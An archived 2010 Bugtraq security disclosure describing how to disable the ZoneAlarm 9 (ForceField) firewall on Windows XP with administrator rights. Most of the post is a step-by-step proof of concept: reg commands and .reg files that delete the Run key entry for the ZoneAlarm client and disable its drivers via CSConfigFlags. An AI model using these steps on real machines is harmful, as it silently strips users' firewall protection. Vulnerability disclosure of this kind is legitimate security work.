[<prev] [next>] [day] [month] [year] [list]
Message-ID: <083ocoPFV1382S08.1268665581@cmsweb08.cms.usa.net>
Date: Mon, 15 Mar 2010 15:06:21 -0000
From: "Andrew Barkley" <barkley@....net>
To: <bugtraq@...urityfocus.com>
Subject: ZoneAlarm 9 (ForceField) Security Disclosure
Hi,
This disclosure pertains to ZoneAlarm 9 (ForceField). ZoneAlarm have been
informed. The following discusses similar issues as was previously disclosed
regarding ZoneAlarm 8.
ZoneAlarm 9 (ForceField)
ZoneAlarm version:9.1.007.002
TrueVector version:9.1.007.002
Driver version:9.1.007.002
Introduction
The following illustrates how one can easily disable ZoneAlarm's security for
whatever purposes. When "exploiting" this (administrative privileges are
assumed) and the system rebooted, ZoneAlarm will be disarmed. I've tested this
on various XP platforms successfully. Please let me know your thoughts on
this.
Impact
This particular "vector" opens the door for "exploitation" via social means,
thus unwitting victims may not even realise that their security has been
disabled, leaving them exposed and unprotected. What if the following simple
"proof of concept" was embedded (obfuscated/scripted/automated) within a
website, executable, document etc; and via social means you unsuspectingly
executed it? ZoneAlarm would be disarmed, leaving you exposed and
unprotected.
Preliminaries
Firstly setup a continuous ping or similar to the system being tested, so as
to verify that ZoneAlarm is working and blocking these.
Step-by-step illustration
1) Firstly make a backup copy of the "Run" key (i.e. Runs).
NOTE: This step is actually not required, however, will look less suspicious
in the Task Manager. You could in fact just execute steps (2) and (5) & (6) if
you wish.
i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /s /f
2) Then use the following 'brute-force' method to delete the "Run" key.
ZoneAlarm 'locks' "ZoneAlarm Client" (zclient.exe), which ultimately controls
& depends on "vsdatant.sys".
NOTE: There is a - prepended to [HKEY] this is intentional. You need to create
a registry file (.reg) with the following entries and execute.
NOTE: Creating & executing the following registry file (.reg), may cause
ZoneAlarm to panic, if so you may (or may not) see your ping replies.
*** Registry entries start here ***
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
*** Registry entries end here ***
3) Delete (if exist) the "ZoneAlarm Clients" entries from the backup key
(Runs).
i.e. Command prompt
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ZoneAlarm
Client" /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs /v "ISW" /f
4) Restore the backup key (Runs) to the original Key "Run". The whole
objective here really is just to rid the "ZoneAlarm Client" (zclient.exe),
thus "vsdatant.sys" is now vulnerable.
i.e. Command prompt
reg copy HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runs
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s /f
5) Create the following registry keys, or registry file (.reg), execute and
reboot.
NOTE: After rebooting, you may find that any egress traffic that used to
prompt for access, now no longer prompts.
*** Registry entries start here ***
Windows Registry Editor Version 5.00
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSDATANT\0000]
"CSConfigFlags"=dword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWKL\0000]
"CSConfigFlags"=dword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_ISWSVC\0000]
"CSConfigFlags"=dword:00000001
[HKEY_CURRENT_CONFIG\System\CurrentControlSet\Enum\ROOT\LEGACY_VSMON\0000]
"CSConfigFlags"=dword:00000001
*** Registry entries end here ***
6) After and having rebooted in the previous step (5), and now that
"vsdatant.sys" is vulnerable, re-run step (5) again (including reboot).
ZoneAlarm should completely be disarmed and all traffic passing freely.
NOTE: This step may (or may not) be required so as to persistently disable
"vsdatant.sys".
Cheers
Andrew Barkley
(-_-)
Powered by blists - more mailing lists